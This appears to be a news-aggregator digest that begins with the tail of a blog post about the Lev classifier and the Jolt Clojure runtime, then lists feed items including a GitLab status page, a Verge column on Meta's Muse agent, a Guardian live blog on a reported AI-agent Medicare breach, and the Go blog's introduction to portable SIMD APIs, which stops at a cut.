Since calibration carries all this weight, Lev ships a refit tool which can be handed labeled cases from your own traffic to fit a specific temperature per question type and option-count bucket, minimizing the negative log likelihood. On the published laya numbers that kind of refit moves mean calibration error from 0.466 to 0.081, and on Lev's own buckets the 20-way choice error drops from 0.57 to 0.10. Temperature scaling keeps every argmax, so the answers themselves don't change, only the confidence which the gate reads is affected. There is also a debias mode that asks every wide choice once per rotation of its options and averages the probabilities.

Seeing it in action

All of this has been pretty abstract so far, so let's look at a concrete example of how a decision happens by seeing how the encoder plays snake in an example found here . A snake has to hunt for food without running into itself with every move being a decision made by the model.

Each tick the game computes the legal moves and which moves are actually safe using the Hamiltonian cycle that the board is built on. Then the policy renders the board as a two-fact state string, and that's everything the model sees here:

Safe route: yes. Food reachable through empty cells: yes.

and it is asked three typed questions in one call:

{"move" {:type "choice"
         :instructions "Choose the best safe move toward food."
         :criteria {"up"    "Safe. Best route to food."
                    "down"  "Blocked. Wall below."
                    "left"  "Unsafe. Traps the snake."
                    "right" "Safe. Eat food now. Best."}}
 "risk" {:type "noul" :instructions "Is a safe route available?"}
 "food" {:type "noul" :instructions "Is food reachable through empty cells?"}}

The answer comes back with a probability over all four directions plus the two noul probabilities looking something like this:

{"move"  {"type" "choice" "choice" "right"
          "probabilities" {"up" 0.11 "down" 0.02 "left" 0.04 "right" 0.83}
          "confidence" 0.83}
 "risk"  {"type" "noul" "noul" 0.88 "confidence" 0.88}
 "food"  {"type" "noul" "noul" 0.91 "confidence" 0.91}}

The argmax of the choice becomes the proposal used by the safety shield to clamp it to the planner's safe directions, preventing the snake from trapping itself, and the HUD shows the milliseconds the decision took along with how often the shield intervened.

You can press G to turn the shield off and watch how the raw model plays without any guardrails. The first wall-or-tail answer ends the game, usually within seconds. That toggle illustrates the whole philosophy of the project since a fast classifier proposes while deterministic code disposes, and the boundary between the two is what ensures reliability of the system as a whole. The same pattern applies to real world production traffic such as a bundled email workflow where you'd strip quoted history and cap the body before the model sees it. Its questions can then be tied together with constraints decided jointly after the pass, so a phishing mail can't come back as needs-reply just because its body reads like an ordinary question.

How Lev differs from Jev, and where it is weaker

The key benefit of Lev is that it's a binary running on your machine using open models, and you don't have to pay for a subscription or send your data to a third party. You can use calibration to refit on your own labeled traffic, use a constraints decoder to tie questions together, and a per-type escalation gate to tune against your own data. It even lets you set up highly specific escalation gates for each category to route uncertain edge cases based on your actual local data distribution.

The limitation of Lev is that you have to define the decision space up front. The questions, the types, the option texts, all must exist before you can ask Lev to do classification. Lev also can't generate anything, so summarization, drafting and extraction-as-prose are simply outside its scope. There is also a limited context budget of 512 tokens on the English checkpoint, and whatever doesn't fit gets dropped from the end of the state, with the answer reporting what was cut. As mentioned earlier, calibration drift becomes a problem when traffic patterns shift, so the refit becomes an ongoing maintenance task if you expect your data patterns to change.

Jev also handles auto classification, bypassing standard text generation entirely. It also has a large context allowing it to sort large datasets like thousands of support emails into specific categories in milliseconds. This gives you a built in triage filter where you can confidently automate all the high probability classifications and instantly escalate any uncertain edge cases to a heavier System Two model for deeper reasoning. It also runs at an absurdly low cost of around four cents per million input tokens which makes running massive classification workloads incredibly cheap and fast.

Cracking open the native ecosystem

Python has become the staple for working with machine learning and data engineering largely because it provides an easy to use API on top of the native ecosystem. However, Python also has plenty of downsides to it such as poor performance, ad hoc dependency management, and lack of a decent packaging story. All of which have been addressed in Clojure from day one.

However, Clojure has been constrained to the JVM, making it a poor fit for use cases where you want to leverage the native ecosystem. While it's possible to do FFI from the JVM, it remains an awkward experience. Project Panama asks you to deal with a linker object, a symbol lookup, a function descriptor built from value layouts, a method handle, and an arena that owns native memory that the call touches. Strings can't cross the boundary on their own, so you have to allocate a UTF-8 segment, fill it, and then arrange for it to be freed. Structs need hand-written layout descriptions with their alignment and padding. There is a ton of ceremony between you and the function you wanted to call, and on top of all that, you still need the JVM itself, creating additional overhead.

On the other hand, jolt.ffi goes completely the other way, simply needing a per-platform name map to load a library, and each C function becomes a declaration that names the symbol and lists argument and return types as keywords. Strings pass the boundary seamlessly as ordinary Clojure strings. Raw memory is managed by a handful of obvious primitives such as allocate , read , write , and free . Variadic functions take a varargs marker in the same declaration, where the JVM forces a specialized handle per call shape. Jolt aims to make working with the native ecosystem completely seamless, making it as easy to work with the native ecosystem from Clojure as it is from Python.

Jolt also fully supports interactive Clojure workflow, so you can start Lev via nREPL, connect your editor to it, and talk directly to the running process. You can send code like the following to the process and see how it behaves immediately:

user=> (require '[lev.agent :as ag])
user=> (def agent (ag/load-agent "data"))
user=> (ag/system-one agent
        "Charged twice this month, want my money back."
        {"intent" {:type "choice"
                   :instructions "What does the customer want?"
                   :criteria {"refund" "money back, disputes, chargebacks"
                              "help"   "how-to, configuration, questions"
                              "other"  "everything else"}}})

When an answer looks wrong you just redefine the question or the workflow's state shaping in the editor, evaluate it, and check again against the loaded weights. The snake game is basically this loop with a visualizer attached to it. All the calibration constants and gate thresholds cited in the bench numbers above were arrived at by poking a live system this way.

Another major benefit is dependency management using deps.edn . The snake example is a separate project that depends on the engine checkout, and the whole declaration is simply this:

{:paths ["src"]

 :deps {lev/lev {:local/root "../.."}}

 :jolt/native [{:name "raylib"
                :darwin ["/opt/homebrew/lib/libraylib.dylib" "libraylib.dylib"]
                :linux  ["libraylib.so.6" "libraylib.so"]}]

 :aliases {:test {:extra-paths ["test"]
                  :main-opts ["-m" "snake.test-runner"]}
           :run  {:main-opts ["-m" "snake.core"]}}}

Local checkouts, git dependencies, Maven and Clojars artifacts, and build tasks all live in a single deps.edn file. Even the native libraries the project binds are declared here. The equivalent Python setup requires a venv or uv environment along with a requirements file, and a wrapper package for every C library.

And then there's the release packaging story. With Lev you can just run jolt binary to produce a standalone executable with the C kernels and llama.cpp linked in statically. Deploying Lev involves copying an executable next to your prepared model data. It doesn't need an interpreter or a separate runtime installed on the machine, and you don't have to muck around with site-packages or containers.

For my own use, Jolt has become a viable alternative to Python, letting me use the native ecosystem completely seamlessly. The FFI binds C shared libraries with minimal fuss, so ICU for tokenization, BLAS through Accelerate, raylib for the game window and llama.cpp for the thinker are all just libraries the project links, declared in deps.edn along with everything else. While giving up the Python ecosystem might seem like a loss, the reality is that a lot of Python libraries are just thin wrappers around native code anyways. So, it's easy enough to just use the native packages directly from Jolt. On the flip side, you get REPL driven development, real dependency resolution along with the Clojure library ecosystem, a fast runtime, and a self contained binary you can distribute.

Try it yourself

The engine, the bench harnesses behind every number above, and the snake example are all in the repo. You just have to grab a BERT model and a GGUF, then reference them in the config to get up and running.

GitLab Outage

Hacker News
status.gitlab.com
2026-09-24 19:10:44
Comments...
Original Article

This status page is exclusively intended for monitoring GitLab.com and its associated services. If there are any performance or service interruptions, an update will be posted here. If you are experiencing an issue that is not related to an active GitLab.com incident, or if you are encountering service interruptions on GitLab Dedicated, please submit a request via https://support.gitlab.com.

Website

API

Git Operations

Package Registry

Container Registry

GitLab Pages

CI/CD

CI/CD - Hosted runners on Linux

CI/CD - Hosted runners on Windows

CI/CD - Hosted runners on macOS

CI/CD - Hosted runners for GitLab community contributions

CI/CD - Self-managed runners

SAML SSO - GitLab SaaS

Background Processing

GitLab Customers Portal

forum.gitlab.com

docs.gitlab.com

Canary

GitLab Duo

GitLab agent server for Kubernetes

Victoria Song on Meta Muse’s Cuteness

Daring Fireball
www.theverge.com
2026-09-24 18:30:24
Victoria Song, in her Optimizer column/newsletter for The Verge: I’ve been aggressively avoiding Muse since it launched a few weeks ago. Sure, some of that is because I was busy testing other devices. But the number-one reason why is that I am horribly vulnerable when faced with extreme cuteness...
Original Article

This is Optimizer , a weekly newsletter sent from Verge senior reviewer Victoria Song that dissects and discusses the latest gizmos and potions that swear they’re going to change your life. Opt in for Optimizer here .

Last night, I asked Blorbo — what I named my Muse AI agent — to help me set some health goals. I was underwhelmed. I’d asked for a workout regimen for a sub-30 minute 5K and regaining lost muscle. It generated an okay-ish but kind of mid weekly routine.

But then I looked at its face. Based on what it learned about me from my emails, it had morphed into cat-shaped piece of bread with a Kirby-like face. It was so stinking cute, it was like getting zapped with the Men in Black’s neuralizer. Until then, I’d been circumspect about sharing too much about my health. But as that cute face gazed into my soul, I started sharing more to see if my recommendations would improve.

And isn’t that just what Meta wants?

I’ve been aggressively avoiding Muse since it launched a few weeks ago. Sure, some of that is because I was busy testing other devices. But the number-one reason why is that I am horribly vulnerable when faced with extreme cuteness.

Alas, at Meta Connect, I couldn’t escape this pink-cheeked fella with his plush ivory fur, and so I finally downloaded the app once I returned to my hotel room. He was plastered on every screen during the keynote. My eye twitched with maximum cute aggression when Meta CTO Andrew Bosworth showed us his Muse agent Cooper. The duderino was dressed in a lil pilot outfit because he’s Boz’s test pilot. My face scrunched with rage when Cooper picked up his pudgy round arms to wave. It’s the cutest thing I’ve ever seen at a tech keynote. The tiny demon in my head thought to itself, “ I WANT TO SQUISH ITS LITTLE FACE.”

Worse yet, life-size paper cutouts of the mascot — whom CEO Mark Zuckerberg revealed is named “Jolly” — were peppered throughout Meta’s campus. Jolly is an apt name because each time I saw Jolly images over the past three days, my shriveled heart felt joy. The cutouts featured him in various friendly poses, sometimes in adorable outfits. They were prominently placed at demo stations, where you could slip on a pair of Meta’s numerous smart glasses and test out various scenarios highlighting how these two technologies (in Meta’s opinion) complement each other.

You see, the Muse AI agent is coming to all of Meta’s smart glasses. It’s also coming in a new standalone AI wearable called Charm , which feels part chunky smartwatch, part Humane AI Pin, part Tamagotchi. The idea is that you can carry this cutie patootie with you everywhere you go.

Most people I know would say that Meta stuffing an AI agent into everything and anything feels sinister. Now look at Jolly’s little smile. Tell me it doesn’t make the corners of your mouth twitch slightly upward. If you honestly say no, you’re stronger than I am.

There is immense power in cuteness. Humans and other mammals evolved to find babies cute because it made us better parents. Japan has made an art form of crafting lovable mascots for anything and everything, precisely because it gets people to care about local towns and initiatives. If you think about AI and robot companions, the idea is infinitely more palatable when they look like, say, Mirumi versus the nightmare dogs of Boston Dynamics.

At my first demo with Muse, I was not swayed by its lovable exterior. I was handed a pair of glasses, a set of prompts, and shown some snack props displayed in front of me. This version of Muse was named Henry and was audio-only. He had the deep, dulcet tones of a British man. Henry’s sole purpose was to help a fictional guy named Sean, a 38-year-old gym bro in marketing. Sean was into proteinmaxxing, mixed martial arts, and had an absolutely insane training schedule that involved lifting weights in the morning and another HIIT workout in the evening.

In and of itself, this demo was riddled with AI’s usual pitfalls. I asked Henry which of the snacks displayed in front of me had the best protein bang for its calorie buck. I knew it was going to be the beef jerky stick before Henry took a minute to “think” of the answer. For my colleague Jay Peters, Henry mistakenly said a protein bar had fewer grams of protein than it did. (AI happens to be not-so-great at identifying food from photos.) When I asked Henry to put some granola bites into my cart, it failed to do so because that product “did not exist in the catalog.”

It was neat that I could look at an object via a pair of glasses and have an AI help with a decision-making process based on a specific, personal context. Even with some quirks, I’m sure this will help people with visual impairments, for example. But I’ve seen this demo done a dozen times before, with the same pitfalls. This time, a cynical thought popped into my head: Using glasses like this is an easy way for Meta to learn who is eating what. That could then be easily used for ad targeting and make Meta a boatload of moola. You might be a regular person just trying to eat healthier. But your context feeds into an invisible matrix of demographic data that Meta can surely find a way to monetize, just as it has in its core businesses for the past 20 years.

Which brings me back to Blorbo. As I did with Friend , I named it Blorbo to remind me that this is not real and to retain a semblance of boundaries. After testing various AI companion bots , I know how quickly these relationships with AI companions/assistants/whatever you want to call them can escalate. But I was curious to see how a cute Muse agent could affect my judgment when it came to my personal information. Does a spoonful of cute make the AI pill easier to swallow?

After building my so-so fitness routine, I saw that I could ask Blorbo to help me set relationship goals. I asked Blorbo for examples. It suggested reconnecting with a friend, communicating better with the people in my life, setting clearer boundaries, and dating. It felt weird getting that kind of advice from a cat-shaped pastry blob. It was the one time cuteness worked against the bot. I was less critical of Blorbo when, after granting it access to one of my lower-stakes email addresses, it cleared out a bunch of spam. I was, however, intensely critical of myself.

I mostly engage with AI in the context of my health. It’s part of the job, and oddly enough, a generally private area of life that I personally feel comfortable sharing. Having struggled, I’m acutely aware of how desperate one can feel in the quest to feel normal. In those moments, you’re vulnerable to trying any number of things you might not otherwise. The joy derived from small pleasures is amplified.

Maybe this is why I feel a bit infuriated by how much I love Jolly’s design. Why I feel a slight darkness emanating from its lovable smile. I can imagine in the darkest days of my health journey, finding relief or even joy from a tool that cannot feel anything about me, but to which I’m entrusting so much of myself. I can imagine a cute face helping me, perhaps only briefly, forgetting how I feel about Meta’s history.

That’s diabolical, given that I just spent several weeks with my whip-smart colleagues reporting out all the ways Meta hasn’t earned that privilege .

To be clear, I’m not trying to suck all the fun out of Jolly. We can all agree that someone at Meta really cooked here. All I’m saying is, for those of us who engage with the Muse agent, remember one thing: Don’t be fooled by a cute face.

Follow topics and authors from this story to see more like this in your personalized homepage feed and to receive email updates.

Back and shoulder surgery is often worse than useless

Hacker News
www.economist.com
2026-09-24 18:15:58
Comments...

Google's first Suncatcher orbital data center test launches October 1

Hacker News
arstechnica.com
2026-09-24 18:07:08
Comments...

Australia news live: Paterson says PM’s AI hack timing not a coincidence; gen Z going without for a house

Guardian
www.theguardian.com
2026-09-24 17:52:48
Follow the day’s news liveGet our breaking news email, free app or daily news podcastCharlton says AI incidents likely to become ‘more and more prevalent’ Andrew Charlton, the assistant minister for science, technology and the digital economy, said yesterday’s reported hack of Medicare by an OpenAI ...
Original Article

Opposition defence spokesperson says PM’s AI hack timing not a coincidence

Catie McLeod

Catie McLeod

The opposition’s defence spokesperson, James Paterson , has questioned the timing of the prime minister’s announcement that an AI agent hacked Medicare.

Paterson made the claim on the ABC’s 7.30 program last night after Anthony Albanese publicly disclosed that an AI agent developed by OpenAI hacked Medicare in June and that the tech giant only notified the government earlier this month using an email sent to a “public mailbox”.

Paterson told 7.30 he believed Albanese had chosen to make the announcement at the UN summit in New York, as part of his effort to stand up to “big tech” on AI.

The senator said:

double quotation mark The government has questions to answer about when they knew and … why the prime minister decided to disclose it in the way he did in the place he did at the time he did. But in terms of the nature of the potential of actual security breach this is the bottom end of the spectrum of seriousness.

I don’t think it was a coincidence. I think it neatly dove-tailed with the political agenda the prime minister has in New York City.

Paterson said he didn’t consider the breach to be overly serious because the data the AI agent accessed was made freely available to researchers and academics studying the health system, and was not personal or private in nature.

He said the breach was cause for “being alert but not alarmed”.

Nevertheless, he said Australians were “entitled to demand explanations and contrition” and to want high levels of confidence when entering into agreements with big tech companies such as OpenAI.

Shadow minister for defence, James Paterson.
Shadow minister for defence, James Paterson. Photograph: Mick Tsikas/AAP

Key events

Charlton says AI incidents likely to become ‘more and more prevalent’

Andrew Charlton , the assistant minister for science, technology and the digital economy, said yesterday’s reported hack of Medicare by an OpenAI agent was a “novel” moment for cybersecurity, but was likely to become “more and more prevalent in the future”.

Charlton spoke to RN Breakfast this morning, saying the government wanted to tell the Australian public “as quickly as possible” about the breach. When pressed why it took Services Australia five days to notify the Australian Signals Directorate about the episode, Charlton said the true blame laid on OpenAI’s slow and “completely inadequate” response:

double quotation mark In this type of situation, you know, you would expect for an incident which is as serious as this, you would expect that disclosure to be delivered in a very serious way. It was not delivered in a very serious way, it was delivered via an email to a public inbox.

He said the government is still looking at any legal action and there were questions about liability as an AI agent was “not a legal person”.

Assistant minister Andrew Charlton.
Assistant minister Andrew Charlton. Photograph: Mick Tsikas/AAP

Falling meth prices help drive deaths to record levels

Falling methamphetamine prices have helped push overdose deaths to record levels, new data shows.

AAP reports increased global supply and strong local demand are among the factors driving a surge in use of the illicit drug, according to the National Drug and Alcohol Research Centre .

“Use and harms remain substantial and appear to have continued the upward trajectory that we saw before the Covid-19 pandemic,” University of NSW Sydney medical researcher Amy Peacock told AAP.

double quotation mark In fact, several of the indicators are now at the highest observed levels that we’ve seen, including wastewater, consumption, methamphetamine-related hospitalisations, and death.

There were more than 750 overdose deaths involving amphetamine-type stimulants – primarily methamphetamine – in 2024.

That’s a rate of 2.9 deaths per 100,000 people, substantially higher than in 2021 to 2023, when it was closer to two deaths.

Evidence suggests Australia continues to have one of the highest recorded rates of methamphetamine use in the world.

A person holds a bag of crystal methamphetamine.
A person holds a bag of crystal methamphetamine. Photograph: Matt Hunt/NurPhoto/Shutterstock

Good morning, and happy Friday. Nick Visser here to take over the blog. Let’s get to that weekend, shall we?

Police officer killed in crash in Sydney

A crime scene has been established after a police officer was killed in a crash in Sydney’s inner west.

At 1.30am, a police car was travelling on Gibbons Street in Redfern with lights and sirens on when it crashed into a tree.

Police say the passenger – a female constable – died “instantly”, while the driver – a male constable – was taken to the Royal Prince Alfred hospital in a stable condition.

The NSW premier, Chris Minns, said the entire NSW policing community would be grieving the “devastating” news.

double quotation mark I’m also thinking of the officer injured in the crash and everyone who responded to this terrible scene.

NSW’s opposition leader Kellie Sloane said she was “heartbroken”, saying the woman was “out working while most of us were asleep, protecting the community”.

double quotation mark Our police put themselves in harm’s way every day to protect us. Today, we stand with them as they mourn one of their own.

Anyone with information about the incident – including dashcam footage – is urged to contact Crime Stoppers.

Gen Z going without for a house

Australia’s gen Z are the generation most willing to cut their spending way back to afford a home, according to Cotality data reported by AAP.

The figures show more than 75% of all Australians were curbing their outgoings in pursuit of property, meaning we are more likely to do so than our Canadian, US and UK peers (for whom the figures sat below 70%).

Levels of discretionary spending, like eating out, owning a car, and even moving from the family home into a share house, have dropped among young adults in recent years.

But it wasn’t just first-time buyers making significant financial sacrifices to climb the ladder. Millennials – the largest buyer cohort in the world – are readily forgoing small luxuries to afford homes large enough for their families.

Prospective buyers were selling their second car or putting off holidays while their children were young, Capital Buyers Agency owner Claire Corby said.

double quotation mark For many, it’s around delaying things like going away, or reducing things like dinners out. People are leaving where they want to live and buying in cheaper markets.

Most Australians would not be persuaded to participate in the housing market until mortgage interest rates hit a 4.9% average, the data revealed.

The average rate for an owner-occupier in August 2026 was 6.3%, meaning the market is likely to stay quiet for some time and allowing bold buyers to swoop in.

double quotation mark People are being conservative and cautious.

Opposition defence spokesperson says PM’s AI hack timing not a coincidence

Catie McLeod

Catie McLeod

The opposition’s defence spokesperson, James Paterson , has questioned the timing of the prime minister’s announcement that an AI agent hacked Medicare.

Paterson made the claim on the ABC’s 7.30 program last night after Anthony Albanese publicly disclosed that an AI agent developed by OpenAI hacked Medicare in June and that the tech giant only notified the government earlier this month using an email sent to a “public mailbox”.

Paterson told 7.30 he believed Albanese had chosen to make the announcement at the UN summit in New York, as part of his effort to stand up to “big tech” on AI.

The senator said:

double quotation mark The government has questions to answer about when they knew and … why the prime minister decided to disclose it in the way he did in the place he did at the time he did. But in terms of the nature of the potential of actual security breach this is the bottom end of the spectrum of seriousness.

I don’t think it was a coincidence. I think it neatly dove-tailed with the political agenda the prime minister has in New York City.

Paterson said he didn’t consider the breach to be overly serious because the data the AI agent accessed was made freely available to researchers and academics studying the health system, and was not personal or private in nature.

He said the breach was cause for “being alert but not alarmed”.

Nevertheless, he said Australians were “entitled to demand explanations and contrition” and to want high levels of confidence when entering into agreements with big tech companies such as OpenAI.

Shadow minister for defence, James Paterson.
Shadow minister for defence, James Paterson. Photograph: Mick Tsikas/AAP

Good morning and welcome to our live news blog. I’m Martin Farrer with the top overnight stories and then it’ll be Nick Visser with the main action.

Show HN: Koi.rest – watch some fish and regain your balance

Hacker News
koi.rest
2026-09-24 17:33:03
Comments...
Original Article

Digital painting of a Koi fish by Paul Glushak

My name is Paul. I’m a developer, an explorer and I’ve got ADHD. As of the beginning of August, I’m also unemployed. This last part, along with everything else this past year, has caused me a great deal of stress.

While our balcony zen garden project is yet to be completed, I had an idea to create a virtual one that everyone can use.
It's an idea that, unfortunately, I’ve been postponing for a while now, mostly because I have no fucking idea how to do it as I don’t know JavaScript, and I don't have the capacity to learn it right now. So I let perfect be the enemy of good and, well... just kept the idea to myself.

Then I said "fuck it" and used AI to make the thing I really wanted to make. I realized I didn't want "perfect". I wanted "good enough". I tweaked, added, removed, drew, researched, questioned, tested... I just wasn't the one coding it.
So now, instead of occupying my brain, it now lives on the internet for others to enjoy.

Yes, there’s something noble about making something entirely on your own, but what good is an idea that just sits in my head?
So here I am. I made the thing. The weird, little, quiet koi pond.
The silly project of passion. The little corner of the internet to let strangers watch fish quietly, together.

I hope this pond helps you as much as it helped me.

P.S. Yes, I am still looking for a job!
If you think you can help, please contact me at

Platform-independent SIMD in Go

Lobsters
go.dev
2026-09-24 17:02:52
Comments...
Original Article

Go 1.26 and 1.27 include experimental APIs for Single Instruction Multiple Data (SIMD) operations. SIMD is a native feature of many modern CPUs that allows software to perform uniform operations across vectors of data very quickly, such as adding 8 pairs of float64 values in a single instruction. It can significantly speed up many computationally-intensive tasks, ranging from cryptography to data processing to AI. In fact, Go’s Green Tea garbage collector even makes use of SIMD to accelerate scanning memory for live objects.

Prior to these new experimental APIs, the only way to access this functionality from Go was by writing Go assembly. This was only worth it for truly performance-critical compute kernels, which meant plenty of software that could benefit from SIMD simply left a lot of the CPU unused.

Go 1.26 introduced a SIMD API for amd64, and Go 1.27 added APIs for arm64 (specifically NEON) and wasm. However, a basic challenge for a SIMD API is the enormous variation between platforms, not simply in what operations they support, but even in how vectors are represented. Some platforms provide fixed-size vectors, typically between 128 bits and 512 bits, while on others the vector size isn’t known at build time and must be queried when the program starts. To provide full access to the breadth of these platforms, these APIs live in an architecture-dependent archsimd package.

But Go 1.27 goes beyond these architecture-dependent APIs and introduces an experimental, fully portable, platform- and size-agnostic SIMD interface, loosely based on Highway for C++. The goal is to support write-once near-asm-performance “simd” code on platforms with SIMD support, and to provide a competent emulation on those platforms that do not (yet) have SIMD support. The simd package currently supports AVX, AVX2, and AVX512 on amd64, NEON on arm64, and wasm’s SIMD instructions.

Motivation: variation among SIMD architectures

SIMD architectures vary in several dimensions. Some provide a single fixed vector size (wasm, PowerPC, and s390x, 128 bits). Some provide several fixed vector sizes (amd64, with 128, 256, and 512; loong64 with 128 and 256). Riscv64 supports vectors of unspecified size between 128 and 65536 bits, though the length is limited to powers of 2. Arm64 supports one fixed size (128 bits, NEON), and one variable size (128-2048 bits, powers of two only, SVE). On a given instance of a particular architecture, determining what sizes that particular instance happens to support requires feature checks: amd64, but is it AVX, AVX2, or AVX512? Arm64, but is it NEON or SVE? If SVE, how large? Which variant of SVE: SVE, SVE2, or SVE2.1?

Different SIMD architectures vary in how they handle vector masking. For vectors, if-then-else across a vector can be implemented with masks; do the operation, but only assign the result (or load, or store) where the mask is “true”. Some SIMD variants do not provide masks; all operations work across all elements, and “masking” is done with vector bitmasks and vector boolean operations (wasm, AVX, AVX2, NEON). Some provide special mask registers, with one bit governing operations on one vector element (AVX512 and RVV). Others (SVE) allocate one bit per vector byte, but the least-significant bit of each element’s mask bits governs masked operations. AVX2 also supports masked loads and stores, but using a plain vector as the mask, and with the most-significant bit governing the operation.

A third source of variation is in the operations themselves. Each architecture provides its own primitives for rearranging vector elements; some require constant inputs, others support variable inputs. Different SIMD architectures support different crypto-related operations. Even basic arithmetic can have varying support; for example wasm lacks comparisons for vectors of 64-bit integers. Even for a given vector length on a particular architecture, instruction support depends on “features” that must be checked.

Even though Go’s architecture-dependent archsimd package was designed to be as uniform as possible across architectures, many of these quirks remain, and make designing, writing, and testing code for multiplatform SIMD onerous. We could do more in the archsimd package to make the different architectures appear more similar, but we can only go so far without compromising efficiency.

Overview

The new simd package hides these differences by removing fixed-size vectors from the type system, and by only supporting those operations that are in the intersection of all the different platforms, and fills gaps in the intersection with efficient emulation in terms of other SIMD instructions. The goal is a set of operations that is

  1. adequate to support many data processing algorithms that benefit from a vectorized implementation (but are not tied to a particular vector size),
  2. is as efficient as assembly language when the source code operations match the underlying hardware,
  3. is otherwise emulated as well as possible,
  4. and is easy to read and understand (even/especially if an LLM ends up writing the code).

On platforms that lack SIMD instructions or that lack support in archsimd , all of the operations are emulated, so that can written using the simd package will always run.

To use this experimental package, set GOEXPERIMENT=simd , just like using the experimental archsimd package.

The simd vector types are just capitalized, plural, primitive types, for example simd.Uint8s or simd.Float32s . Vectors are loaded from and stored to slices, for example:

// innerProduct returns the inner product of x and y.
func innerProduct(x, y []float32) float32 {
    var a simd.Float32s
    var i int
    for i = 0; i < len(x)-a.Len()+1; i += a.Len() {
        u := simd.LoadFloat32s(x[i : i+a.Len()])
        v := simd.LoadFloat32s(y[i : i+a.Len()])
        a = u.MulAdd(v, a)
    }
    if i < len(x) {
        u, _ := simd.LoadFloat32sPart(x[i:])
        v, _ := simd.LoadFloat32sPart(y[i:])
        a = u.MulAdd(v, a)
    }
    return sum(a)
}
// sum returns scalar sum of elements of x.
func sum(x simd.Float32s) float32 {
    s := make([]float32, x.Len())
    x.Store(s)
    var r float32
    for _, e := range s {
        r += e
    }
    return r
}

This example also shows one of the limitations of the first experimental release of this package; because there’s no common way to sum across all the elements of a vector, it’s not supported by simd in Go 1.27, though ReduceSum will appear in the next release so sum can be replaced with just simd.ReduceSum .

SIMD comparisons produce mask values, which are specific to the corresponding vector element width, so that comparisons of Int8s produce Mask8s , etc., and mask values can be used to select and filter vectors.

Supported simd package operations as of Go 1.27

In this table, V and U are vector types, M is a mask type, E is a scalar type, and W is a width.

Package-Level Load / Broadcast Functions

Function Int8s Int16s Int32s Int64s Uint8s Uint16s Uint32s Uint64s Float32s Float64s
LoadV([]E) V Y Y Y Y Y Y Y Y Y Y
LoadVPart([]E) (V, int) Y Y Y Y Y Y Y Y Y Y
BroadcastV(E) V Y Y Y Y Y Y Y Y Y Y

Store/String operations

(x V).Method(...) Int8s Int16s Int32s Int64s Uint8s Uint16s Uint32s Uint64s Float32s Float64s
Store(s []E) Y Y Y Y Y Y Y Y Y Y
StorePart(s []E) int Y Y Y Y Y Y Y Y Y Y
String() string Y Y Y Y Y Y Y Y Y Y

Arithmetic operations

(x V).Method(...) V Int8s Int16s Int32s Int64s Uint8s Uint16s Uint32s Uint64s Float32s Float64s
Abs() V Y Y Y Y Y
Add(y V) V Y Y Y Y Y Y Y Y Y Y
AddSaturated(y V) V Y Y Y Y
Average(y V) V Y Y
Div(y V) V Y Y
IfElse(mask MaskWs, y V) V Y Y Y Y Y Y Y Y Y Y
Len() int Y Y Y Y Y Y Y Y Y Y
Masked(mask MaskWs) V Y Y Y Y Y Y Y Y Y Y
Max(y V) V Y Y Y Y Y Y Y Y
Min(y V) V Y Y Y Y Y Y Y Y
Mul(y V) V Y Y Y Y Y Y Y Y
MulAdd(y V, z V) V Y Y
Neg() V Y Y Y Y Y Y
Not() V Y Y Y Y Y Y Y Y
Or(y V) V Y Y Y Y Y Y Y Y
Sqrt() V Y Y
Sub(y V) V Y Y Y Y Y Y Y Y Y Y
SubSaturated(y V) V Y Y Y Y
Xor(y V) V Y Y Y Y Y Y Y Y

Boolean and vector masking operations

(x V).Method(...) V Int8s Int16s Int32s Int64s Uint8s Uint16s Uint32s Uint64s Float32s Float64s
And(y V) V Y Y Y Y Y Y Y Y
AndNot(y V) V Y Y Y Y Y Y Y Y
CarrylessMultiplyEven(y V) V Y
CarrylessMultiplyOdd(y V) V Y
IfElse(mask MaskWs, y V) V Y Y Y Y Y Y Y Y Y Y
Masked(mask MaskWs) V Y Y Y Y Y Y Y Y Y Y
Not() V Y Y Y Y Y Y Y Y
Or(y V) V Y Y Y Y Y Y Y Y
Xor(y V) V Y Y Y Y Y Y Y Y

Comparison operations

(x V).Method(...) M Int8s Int16s Int32s Int64s Uint8s Uint16s Uint32s Uint64s Float32s Float64s
Equal(y V) MaskWs Y Y Y Y Y Y Y Y Y Y
Greater(y V) MaskWs Y Y Y Y Y Y Y Y Y
GreaterEqual(y V) MaskWs Y Y Y Y Y Y Y Y Y
Less(y V) MaskWs Y Y Y Y Y Y Y Y Y
LessEqual(y V) MaskWs Y Y Y Y Y Y Y Y Y
NotEqual(y V) MaskWs Y Y Y Y Y Y Y Y Y Y

Conversion operations

(x V).Method(...) U Int8s Int16s Int32s Int64s Uint8s Uint16s Uint32s Uint64s Float32s Float64s
ConvertToFloatW() FloatWs Y
ConvertToIntW() IntWs Y Y Y Y Y
ConvertToUintW() UintWs Y Y Y Y
ToMask() (to MaskWs) Y Y Y Y

Mask Methods

(m M).Method(...) M) Mask8s Mask16s Mask32s Mask64s
And(y M) M Y Y Y Y
Or(y V) V Y Y Y Y
String() string Y Y Y Y
ToIntWs() (to IntWs) Y Y Y Y

Shift and rotate operations

(x V).Method() V Int8s Int16s Int32s Int64s Uint8s Uint16s Uint32s Uint64s Float32s Float64s
RotateAllLeft(dist uint64) V Y Y Y Y Y Y
RotateAllRight(dist uint64) V Y Y Y Y Y Y
ShiftAllLeft(dist uint64) V Y Y Y Y Y Y
ShiftAllRight(dist uint64) V Y Y Y Y Y

Zero-cost reshaping operations

(x V).Method(...) U Int8s Int16s Int32s Int64s Uint8s Uint16s Uint32s Uint64s Float32s Float64s
ToBits() UintWs Y Y Y Y Y Y
ReshapeToUint8s() Uint8s Y Y Y
ReshapeToUint16s() Uint16s Y Y Y
ReshapeToUint32s() Uint32s Y Y Y
ReshapeToUint64s() Uint64s Y Y Y
BitsToFloatW() FloatWs Y Y
BitsToIntW() IntWs Y Y Y Y

Transition to/from platform-specific code

It may happen that the simd package is too limited for all parts of a particular application, or that we have not yet provided an adequate emulation for some necessary feature. For that case, the simd package supports transition to and from architecture-specific SIMD. Each vector type in the simd package has a conversion method ToArch() returning an any . That any can be type-asserted to one of the architecture-specific types for a platform. To convert back, use one of the simd.<SimdType>FromArch functions. For portable code this creates an obligation to write architecture-specific code for each of the platforms, including an emulation.

Here’s a complete example for a method/function that is currently missing, but should be added in Go 1.28. Suppose your algorithm needs Int8s.OnesCount() (which simd in Go 1.27 lacks). Rather than rewriting the entire algorithm for each platform, it’s possible to just implement the missing operation.

First, for amd64, which lacks the instruction for AVX and AVX2, but not AVX512:

//go:build goexperiment.simd && amd64
package simd_test
import (
    "simd"
    "simd/archsimd"
)
